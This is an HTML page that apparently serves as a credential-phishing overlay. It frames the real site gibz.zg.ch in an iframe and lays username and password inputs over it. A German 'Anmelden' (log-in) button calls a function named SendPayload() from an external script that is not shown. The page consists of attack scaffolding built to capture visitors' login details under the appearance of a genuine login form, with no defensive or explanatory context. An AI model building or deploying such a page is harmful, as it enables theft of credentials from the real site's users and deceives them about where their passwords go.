<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" type="text/css" href="index.css">
</head>
<body>
    <iframe id="iframe" src="https://gibz.zg.ch"></iframe>
    <div id="container_form">
        <div class="outerbox">
            <div class="overlay">
                <div class="input_holder">
                    <input id="username" class="input" type="text">
                </div> 
            </div>
            <div class="overlay">
                <div class="input_holder">
                    <input id="password" class="input" type="password">
                </div> 
            </div>
        </div>
    </div>
    <div id="container_button">
        <div class="overlay">
            <button id="confirm_button" onclick="SendPayload()">Anmelden</button>
        </div>
    </div>
</body>
</html>

<script src="index.js"></script>